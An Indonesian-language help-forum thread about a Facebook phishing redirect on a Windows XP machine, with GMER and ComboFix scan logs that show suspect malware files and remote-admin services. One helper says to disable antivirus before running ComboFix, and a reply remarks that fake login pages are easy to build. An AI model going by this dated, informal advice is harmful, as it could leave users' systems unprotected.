Reg             HKLM\SYSTEM\ControlSet002\Services\SharedAccess\Epoch@Epoch                                                                                                                         37
Reg             HKLM\SYSTEM\ControlSet002\Services\Tcpip\Parameters\Interfaces\{011394B8-651C-43E4-A5F9-6E2EC369E81C}@LeaseObtainedTime                                                             1292592288
Reg             HKLM\SYSTEM\ControlSet002\Services\Tcpip\Parameters\Interfaces\{011394B8-651C-43E4-A5F9-6E2EC369E81C}@T1                                                                            1292721888
Reg             HKLM\SYSTEM\ControlSet002\Services\Tcpip\Parameters\Interfaces\{011394B8-651C-43E4-A5F9-6E2EC369E81C}@T2                                                                            1292819088
Reg             HKLM\SYSTEM\ControlSet002\Services\Tcpip\Parameters\Interfaces\{011394B8-651C-43E4-A5F9-6E2EC369E81C}@LeaseTerminatesTime                                                           1292851488
Reg             HKLM\SYSTEM\ControlSet002\Services\{011394B8-651C-43E4-A5F9-6E2EC369E81C}\Parameters\Tcpip@LeaseObtainedTime                                                                        1292592288
Reg             HKLM\SYSTEM\ControlSet002\Services\{011394B8-651C-43E4-A5F9-6E2EC369E81C}\Parameters\Tcpip@T1                                                                                       1292721888
Reg             HKLM\SYSTEM\ControlSet002\Services\{011394B8-651C-43E4-A5F9-6E2EC369E81C}\Parameters\Tcpip@T2                                                                                       1292819088
Reg             HKLM\SYSTEM\ControlSet002\Services\{011394B8-651C-43E4-A5F9-6E2EC369E81C}\Parameters\Tcpip@LeaseTerminatesTime                                                                      1292851488
Reg             HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Group Policy\State\Machine\Extension-List\{00000000-0000-0000-0000-000000000000}@StartTimeLo                                         931551994
Reg             HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Group Policy\State\Machine\Extension-List\{00000000-0000-0000-0000-000000000000}@StartTimeHi                                         30121511
Reg             HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Group Policy\State\Machine\Extension-List\{00000000-0000-0000-0000-000000000000}@EndTimeLo                                           931551994
Reg             HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Group Policy\State\Machine\Extension-List\{00000000-0000-0000-0000-000000000000}@EndTimeHi                                           30121511
Reg             HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Group Policy\State\S-1-5-21-1060284298-1425521274-1417001333-1003\Extension-List\{00000000-0000-0000-0000-000000000000}@StartTimeLo  -1313669664
Reg             HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Group Policy\State\S-1-5-21-1060284298-1425521274-1417001333-1003\Extension-List\{00000000-0000-0000-0000-000000000000}@StartTimeHi  30121508
Reg             HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Group Policy\State\S-1-5-21-1060284298-1425521274-1417001333-1003\Extension-List\{00000000-0000-0000-0000-000000000000}@EndTimeLo    -1313669664
Reg             HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Group Policy\State\S-1-5-21-1060284298-1425521274-1417001333-1003\Extension-List\{00000000-0000-0000-0000-000000000000}@EndTimeHi    30121508
Reg             HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Group Policy\State\S-1-5-21-1060284298-1425521274-1417001333-1003\GPO-List\0@Version                                                 393222
Reg             HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00002109030000000000000000F01FEC\Usage@GrooveFiles                                              1032912905
Reg             HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00002109030000000000000000F01FEC\Usage@ProductFiles                                             1032912907
Reg             HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00002109AB0090400000000000F01FEC\Usage@GrooveFilesIntl_1033                                     1032912905
Reg             HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Mozilla Firefox (3.6.12)                                                                                                   
Reg             HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Mozilla Firefox (3.6.12)@Comments                                                                                          Mozilla Firefox
Reg             HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Mozilla Firefox (3.6.12)@DisplayIcon                                                                                       C:\Program Files\Mozilla Firefox\firefox.exe,0
Reg             HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Mozilla Firefox (3.6.12)@DisplayName                                                                                       Mozilla Firefox (3.6.12)
Reg             HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Mozilla Firefox (3.6.12)@DisplayVersion                                                                                    3.6.12 (en-US)
Reg             HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Mozilla Firefox (3.6.12)@InstallLocation                                                                                   C:\Program Files\Mozilla Firefox
Reg             HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Mozilla Firefox (3.6.12)@Publisher                                                                                         Mozilla
Reg             HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Mozilla Firefox (3.6.12)@UninstallString                                                                                   C:\Program Files\Mozilla Firefox\uninstall\helper.exe
Reg             HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Mozilla Firefox (3.6.12)@URLInfoAbout                                                                                      http://www.mozilla.com/en-US/
Reg             HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Mozilla Firefox (3.6.12)@URLUpdateInfo                                                                                     http://www.mozilla.com/en-US/firefox/
Reg             HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Mozilla Firefox (3.6.12)@NoModify                                                                                          1
Reg             HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Mozilla Firefox (3.6.12)@NoRepair                                                                                          1
Reg             HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Prefetcher@StartTime                                                                                                              2010/12/17-20:24:45
Reg             HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Prefetcher@TracesProcessed                                                                                                        27
Reg             HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Prefetcher@TracesSuccessful                                                                                                       27
Reg             HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\S-1-5-19@ProfileLoadTimeLow                                                                                           -985624634
Reg             HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\S-1-5-19@ProfileLoadTimeHigh                                                                                          30121453
Reg             HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\S-1-5-19@RefCount                                                                                                     2
Reg             HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\S-1-5-20@ProfileLoadTimeLow                                                                                           -988124634
Reg             HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\S-1-5-20@ProfileLoadTimeHigh                                                                                          30121453
Reg             HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\S-1-5-21-1060284298-1425521274-1417001333-1003@ProfileLoadTimeLow                                                     -974999634
Reg             HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\S-1-5-21-1060284298-1425521274-1417001333-1003@ProfileLoadTimeHigh                                                    30121453
Reg             HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\S-1-5-21-1060284298-1425521274-1417001333-1003@RefCount                                                               0
Reg             HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer@CleanShutdown                                                                                                               1
Reg             HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced@Hidden                                                                                                             2
Reg             HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\ComDlg32\LastVisitedMRU@MRUList                                                                                             a
Reg             HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\ComDlg32\OpenSaveMRU\*@MRUList                                                                                              a
Reg             HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{72853161-30C5-4D22-B7F9-0BBC1D38A37E}\iexplore@Count                                                                      19
Reg             HKCU\Software\Microsoft\Windows\CurrentVersion\Group Policy\History\{35378EAC-683F-11D2-A89A-00C04FBBCFA2}\0@Version                                                                393222
Reg             HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer@NoFolderOptions                                                                                                    1
Reg             HKCU\Software\Microsoft\Windows\ShellNoRoam\Bags\11\Shell@MinPos1366x768(1).x                                                                                                       -1
Reg             HKCU\Software\Microsoft\Windows\ShellNoRoam\Bags\11\Shell@MinPos1366x768(1).y                                                                                                       -1
Reg             HKCU\Software\Microsoft\Windows\ShellNoRoam\Bags\11\Shell@WinPos1366x768(1).left                                                                                                    132
Reg             HKCU\Software\Microsoft\Windows\ShellNoRoam\Bags\11\Shell@WinPos1366x768(1).top                                                                                                     138
Reg             HKCU\Software\Microsoft\Windows\ShellNoRoam\Bags\11\Shell@WinPos1366x768(1).right                                                                                                   932
Reg             HKCU\Software\Microsoft\Windows\ShellNoRoam\Bags\11\Shell@WinPos1366x768(1).bottom                                                                                                  738
Reg             HKCU\Software\Microsoft\Windows\ShellNoRoam\Bags\22\Shell@MinPos1366x768(1).x                                                                                                       -1
Reg             HKCU\Software\Microsoft\Windows\ShellNoRoam\Bags\22\Shell@MinPos1366x768(1).y                                                                                                       -1
Reg             HKCU\Software\Microsoft\Windows\ShellNoRoam\Bags\22\Shell@WinPos1366x768(1).left                                                                                                    132
Reg             HKCU\Software\Microsoft\Windows\ShellNoRoam\Bags\22\Shell@WinPos1366x768(1).top                                                                                                     138
Reg             HKCU\Software\Microsoft\Windows\ShellNoRoam\Bags\22\Shell@WinPos1366x768(1).right                                                                                                   932
Reg             HKCU\Software\Microsoft\Windows\ShellNoRoam\Bags\22\Shell@WinPos1366x768(1).bottom                                                                                                  738
Reg             HKCU\Software\Microsoft\Windows\ShellNoRoam\Bags\45\Shell@WinPos1366x768(1).left                                                                                                    132
Reg             HKCU\Software\Microsoft\Windows\ShellNoRoam\Bags\45\Shell@WinPos1366x768(1).top                                                                                                     138
Reg             HKCU\Software\Microsoft\Windows\ShellNoRoam\Bags\45\Shell@WinPos1366x768(1).right                                                                                                   932
Reg             HKCU\Software\Microsoft\Windows\ShellNoRoam\Bags\45\Shell@WinPos1366x768(1).bottom                                                                                                  738
Reg             HKCU\Software\Microsoft\Windows\ShellNoRoam\Bags\9\Shell@WinPos1366x768(1).left                                                                                                     132
Reg             HKCU\Software\Microsoft\Windows\ShellNoRoam\Bags\9\Shell@WinPos1366x768(1).top                                                                                                      138
Reg             HKCU\Software\Microsoft\Windows\ShellNoRoam\Bags\9\Shell@WinPos1366x768(1).right                                                                                                    932
Reg             HKCU\Software\Microsoft\Windows\ShellNoRoam\Bags\9\Shell@WinPos1366x768(1).bottom                                                                                                   738
Reg             HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\GPExtensions\{35378EAC-683F-11D2-A89A-00C04FBBCFA2}@LastPolicyTime                                                       16282182

---- Files - GMER 1.0.15 ----

File            C:\Documents and Settings\Crocs 2\Local Settings\Application Data\Mozilla\Firefox\Mozilla Firefox\updates\0\update.mar                                                              2725258 bytes
File            C:\Documents and Settings\Crocs 2\Local Settings\Application Data\Mozilla\Firefox\Mozilla Firefox\updates\0\update.status                                                           8 bytes
File            C:\Documents and Settings\Crocs 2\Local Settings\Application Data\Mozilla\Firefox\Mozilla Firefox\updates\0\update.version                                                          7 bytes
File            C:\Documents and Settings\Crocs 2\Local Settings\Temp\3d2d45fc9c1a.tmp                                                                                                              989696 bytes executable
File            C:\Documents and Settings\Crocs 2\Local Settings\Temp\682c5f3a57dd.tmp                                                                                                              23040 bytes executable
File            C:\Documents and Settings\Crocs 2\Local Settings\Temp\91606241ec1a.tmp                                                                                                              82432 bytes executable
File            C:\Documents and Settings\Crocs 2\Local Settings\Temp\adc73fc63336.tmp                                                                                                              989696 bytes executable
File            C:\Documents and Settings\Crocs 2\Local Settings\Temp\b009614d0de5.tmp                                                                                                              23040 bytes executable
File            C:\Documents and Settings\Crocs 2\Local Settings\Temp\c48f5938c27c.tmp                                                                                                              578560 bytes executable
File            C:\Documents and Settings\Crocs 2\Local Settings\Temp\ce7e4be3c562.tmp                                                                                                              706048 bytes executable
File            C:\Documents and Settings\Crocs 2\Local Settings\Temp\db3d6363a0a3.tmp                                                                                                              82432 bytes executable
File            C:\Documents and Settings\Crocs 2\Local Settings\Temp\mmc0F0237A0.xml                                                                                                               0 bytes
File            C:\Program Files\Mozilla Firefox\components\compreg.dat                                                                                                                             147900 bytes
File            C:\Program Files\Mozilla Firefox\components\xpti.dat                                                                                                                                102494 bytes
File            C:\Program Files\Mozilla Firefox\js3250.dll                                                                                                                                         (size mismatch) 1018840/1017304 bytes executable
File            C:\Program Files\Mozilla Firefox\plds4.dll                                                                                                                                          (size mismatch) 18904/19416 bytes executable
File            C:\Program Files\Mozilla Firefox\xul.dll                                                                                                                                            (size mismatch) 11744216/11775448 bytes executable

---- EOF - GMER 1.0.15 ----

Thumbs up

19

Re: Virus facebook web forgery

Menurut ane sih komp TS baek2 aja...Phishing cuman masalah Firefox yg redirect aja ..
udah coba kirim ke firefoxnya ? kasih report kesini : http://www.google.com/safebrowsing/repo … o.id%2F%23

untuk mencegah (bkn ngobatin yaks  tongue ) redirect gunakan ini :


1.) Buka Firefox 3 misalnya.

2) Klik. pada Tools. Selanjutnya Klik pada Options.

3) Klik. pada tab Advanced. Klik sub tab

4.) Pilih kotak centang yang mengatakan "Peringatkan saya jika situs web mencoba mengalihkan atau memuat ulang halaman".

5) Klik Ok..
cool

Last edited by RYL Gunners (18-12-2010 17:09:49)

Dapet Virus?? Upload Virusnya ke >> Mohon Pake ZIP/RAR kasih Password: 1 www.pcmav.site40.net
-Do Not Spam.. I Hated It-  Always Standby In ForuM

Thumbs up

20

Re: Virus facebook web forgery

atau mau pake coba Tools Juga Boleh Gan...

Download disini : http://www.anti-phishing.info/anti-phis … eeware.htm

Free kok... semoga membantu yaks  cool  wink

Dapet Virus?? Upload Virusnya ke >> Mohon Pake ZIP/RAR kasih Password: 1 www.pcmav.site40.net
-Do Not Spam.. I Hated It-  Always Standby In ForuM

Thumbs up

21

Re: Virus facebook web forgery

Yang ini
4.) Pilih kotak centang yang mengatakan "Peringatkan saya jika situs web mencoba mengalihkan atau memuat ulang halaman".

kaga ngefek bro. Untuk yang Toolsnya, ada rekomendasi ga? Repot kalo coba satu2 tongue

Thumbs up

22

Re: Virus facebook web forgery

coba download ComboFix : http://download.bleepingcomputer.com/sUBs/ComboFix.exe

Simpan ke Desktop.

Nonaktifkan dolo aplikasi AntiVirus dan AntiSpyware, soalnya dapat mengganggu Combofix.

Skr pastiin ga ada program lain yang berjalan, tutup semua jendela lain.

klik dua kali pada file . Ikutin petunjuk di layar untuk mulai scan.
Stelah proses scanning telah dimulai silahkan JANGAN klik pada jendela Combofix atau mencoba untuk menggunakan komputer Anda karena hal ini dapat menyebabkan proses scanning rwt
Mungkin diperluin bberapa saat untuk nyelesein pendownloadan , itu normal/wajar.

Anda akan terputus dari internet dan Anda desktop ikon / toolbar akan hilang selama pendownloadan, jangan khawatir, ini adalah normal dan akan dikembalikan setelah pendownloadan selesai.

Combofix akan menciptakan sebuah file log dan menampilkan setelah komputer Anda reboot.
Biasanya terletak di c: combofix.txt \, silahkan posting ke balasan berikutnya

Log akan cukup besar n ane butuh waktu buat selidikin lognya ok   wink
huppph....cape ketiknya... lol

Dapet Virus?? Upload Virusnya ke >> Mohon Pake ZIP/RAR kasih Password: 1 www.pcmav.site40.net
-Do Not Spam.. I Hated It-  Always Standby In ForuM

Thumbs up

23

Re: Virus facebook web forgery

Ini saya post log  comboFix-nya om

ComboFix 10-12-17.02 - Crocs 2 12/18/2010  20:11:11.1.2 - x86
Microsoft Windows XP Professional  5.1.2600.3.1252.1.1033.18.1023.740 [GMT 7:00]
Running from: c:\documents and settings\Crocs 2\My Documents\Downloads\ComboFix.exe
.

(((((((((((((((((((((((((((((((((((((((   Other Deletions   )))))))))))))))))))))))))))))))))))))))))))))))))
.

C:\dfinstall.log
c:\windows\syswin32.exe
c:\windows\taskmgr.exe

.
(((((((((((((((((((((((((((((((((((((((   Drivers/Services   )))))))))))))))))))))))))))))))))))))))))))))))))
.

-------\Service_msdirectx


(((((((((((((((((((((((((   Files Created from 2010-11-18 to 2010-12-18  )))))))))))))))))))))))))))))))
.

2010-12-16 01:48 . 2010-12-16 01:49    16336546    ------w-    C:\Persi0.sys
2010-12-16 01:38 . 2010-12-16 01:38    --------    d-----w-    C:\[Smad-Cage]

.
((((((((((((((((((((((((((((((((((((((((   Find3M Report   ))))))))))))))))))))))))))))))))))))))))))))))))))))
.
.

------- Sigcheck -------

[-] 2008-05-03 . 9F42478360E9B053A6703DEF39B4CE33 . 1614848 . . [5.1.2600.5512] . . c:\windows\system32\sfcfiles.dll
.
(((((((((((((((((((((((((((((((((((((   Reg Loading Points   ))))))))))))))))))))))))))))))))))))))))))))))))))
.
.
*Note* empty entries & legit default entries are not shown
REGEDIT4

[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"Messenger (Yahoo!)"="c:\program files\Yahoo!\Messenger\YahooMessenger.exe" [2010-06-01 5252408]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"SM?RT-Protection"="c:\program files\Smadav\SM?RTP.exe" [?]
"HDAudDeck"="c:\program files\VIA\VIAudioi\HDADeck\HDeck.exe" [2009-05-14 33624064]
"StartCCC"="c:\program files\ATI Technologies\ATI.ACE\Core-Static\CLIStart.exe" [2010-05-04 102400]
"Adobe Reader Speed Launcher"="c:\program files\Adobe\Reader 9.0\Reader\Reader_sl.exe" [2008-06-11 34672]
"GrooveMonitor"="c:\program files\Microsoft Office\Office12\GrooveMonitor.exe" [2006-10-26 31016]
"ClocX"="c:\program files\ClocX\ClocX.exe" [2007-07-26 270336]
"WinampAgent"="c:\program files\Winamp\winampa.exe" [2010-12-09 74752]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunServices]
"WinSystemLibrary"="pwrszr.exe -system" [X]

[HKEY_USERS\.default\software\microsoft\windows\currentversion\policies\system]
"DisableRegistryTools"= 1 (0x1)

[HKEY_CURRENT_USER\software\microsoft\windows\currentversion\policies\explorer]
"NoSMHelp"= 1 (0x1)
"DisableRegistryTools"= 1 (0x1)

[HKEY_USERS\.default\software\microsoft\windows\currentversion\policies\explorer]
"DisableRegistryTools"= 1 (0x1)

[HKEY_LOCAL_MACHINE\software\microsoft\windows nt\currentversion\winlogon\notify\DfLogon]
2009-09-28 17:09    65536    ----a-w-    c:\windows\system32\LogonDll.dll

[HKEY_LOCAL_MACHINE\system\currentcontrolset\control\session manager]
BootExecute    REG_MULTI_SZ       autocheck autochk /k:C /k:D /k:X *

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\SYSQINTP]
@="LegacyDriver"

[HKLM\~\services\sharedaccess\parameters\firewallpolicy\standardprofile\AuthorizedApplications\List]
"%windir%\\Network Diagnostic\\xpnetdiag.exe"=
"%windir%\\system32\\sessmgr.exe"=
"c:\\WINDOWS\\system32\\rserver30\\rserver3.exe"=
"c:\\Program Files\\Microsoft Office\\Office12\\OUTLOOK.EXE"=
"c:\\Program Files\\Microsoft Office\\Office12\\GROOVE.EXE"=
"c:\\Program Files\\Microsoft Office\\Office12\\ONENOTE.EXE"=
"c:\\Program Files\\Yahoo!\\Messenger\\YahooMessenger.exe"=
"c:\\Program Files\\Winamp\\winamp.exe"=
"x:\\GAMES\\PointBlank\\PointBlank.exe"=

R0 DeepFrz;DeepFrz;c:\windows\system32\drivers\DeepFrz.sys [9/29/2009 12:11 AM 153368]
R1 raddrvv3;raddrvv3;c:\windows\system32\rserver30\raddrvv3.sys [10/9/2009 2:00 PM 46304]
R2 DFServ;DFServ;c:\program files\Faronics\Deep Freeze\Install C-0\DFServ.exe [9/29/2009 12:02 AM 1056768]
R2 RServer3;Radmin Server V3;c:\windows\system32\rserver30\rserver3.exe [10/9/2009 2:00 PM 1242504]
R2 SysqintP;SysqintP;c:\program files\Client008\client008.exe [12/16/2010 8:53 AM 523264]
R3 VIAHdAudAddService;VIA High Definition Audio Driver Service;c:\windows\system32\drivers\viahduaa.sys [12/16/2010 1:15 AM 1358720]
S3 EagleXNt;EagleXNt;\??\c:\windows\system32\drivers\EagleXNt.sys --> c:\windows\system32\drivers\EagleXNt.sys [?]
.
.
------- Supplementary Scan -------
.
IE: E&xport to Microsoft Excel - c:\progra~1\MICROS~2\Office12\EXCEL.EXE/3000
FF - ProfilePath - c:\documents and settings\Crocs 2\Application Data\Mozilla\Firefox\Profiles\77bubzmu.default\
FF - Ext: Default: {972ce4c6-7e08-4474-a285-3208198ce6fd} - c:\program files\Mozilla Firefox\extensions\{972ce4c6-7e08-4474-a285-3208198ce6fd}
.
- - - - ORPHANS REMOVED - - - -

HKLM-Run-a001 - (no file)
HKLM-RunServices-a001 - (no file)



**************************************************************************
scanning hidden processes ... 

scanning hidden autostart entries ...

HKLM\Software\Microsoft\Windows\CurrentVersion\Run
  HDAudDeck = c:\program files\VIA\VIAudioi\HDADeck\HDeck.exe 1????????????????????????????????????????????????

scanning hidden files ... 

scan completed successfully
hidden files:

**************************************************************************
.
--------------------- DLLs Loaded Under Running Processes ---------------------

- - - - - - - > 'winlogon.exe'(696)
c:\windows\system32\Ati2evxx.dll
c:\windows\system32\atiadlxx.dll
c:\windows\system32\LogonDll.dll
.
------------------------ Other Running Processes ------------------------
.
c:\windows\system32\Ati2evxx.exe
c:\windows\system32\Ati2evxx.exe
c:\program files\ATI Technologies\ATI.ACE\Core-Static\MOM.exe
c:\program files\ATI Technologies\ATI.ACE\Core-Static\ccc.exe
c:\windows\system32\wdfmgr.exe
c:\windows\system32\rserver30\FamItrfc.Exe
c:\program files\Faronics\Deep Freeze\Install C-0\_$Df\FrzState2k.exe
c:\program files\Yahoo!\Messenger\ymsgr_tray.exe
c:\windows\system32\wscntfy.exe
.
**************************************************************************
.
Completion time: 2010-12-18  20:15:18 - machine was rebooted
ComboFix-quarantined-files.txt  2010-12-18 13:15

Pre-Run: 16,035,352,576 bytes free
Post-Run: 15,951,769,600 bytes free

WindowsXP-KB310994-SP2-Pro-BootDisk-ENU.exe
[boot loader]
timeout=2
default=multi(0)disk(0)rdisk(0)partition(1)\WINDOWS
[operating systems]
c:\cmdcons\BOOTSECT.DAT="Microsoft Windows Recovery Console" /cmdcons
UnsupportedDebug="do not select this" /debug
multi(0)disk(0)rdisk(0)partition(1)\WINDOWS="Microsoft Windows XP Professional" /noexecute=optin /fastdetect

- - End Of File - - 321D677B68F9042B38ADBFB8E49CB851

Thumbs up

24

Re: Virus facebook web forgery

RYL Gunners wrote:

Klow ga bisa juga Ganti Winsock pada System32 .. copy dari PC laen...

Udah gw coba tetep ga bisa bro

Perkembangan terbaru, teryata di IE kena juga

http://img687.imageshack.us/img687/9981/fbhackie1.jpg
http://img513.imageshack.us/img513/7223/fbhackie2.jpg

Jadi bukan firefoxnya aja yang keinfeksi.
Flashdisknya gw tancepin semalaman kaga ada yang diserang
Jadinya gw harus ngupload-in file apa nih bro?


NB: keliatan kalo yang bikin virus bukan web designer, soalnya tampilan di IE kaco tongue

Last edited by blind337 (19-12-2010 06:18:56)

Thumbs up

25

Re: Virus facebook web forgery

bikin fakelogin itu gampang masbro. yg sulit itu social engineeringnya.

ntar yah masbro, lagi mikir2..

"If you measured good and evil deeds by current laws, I would be responsible for many crimes." ~ L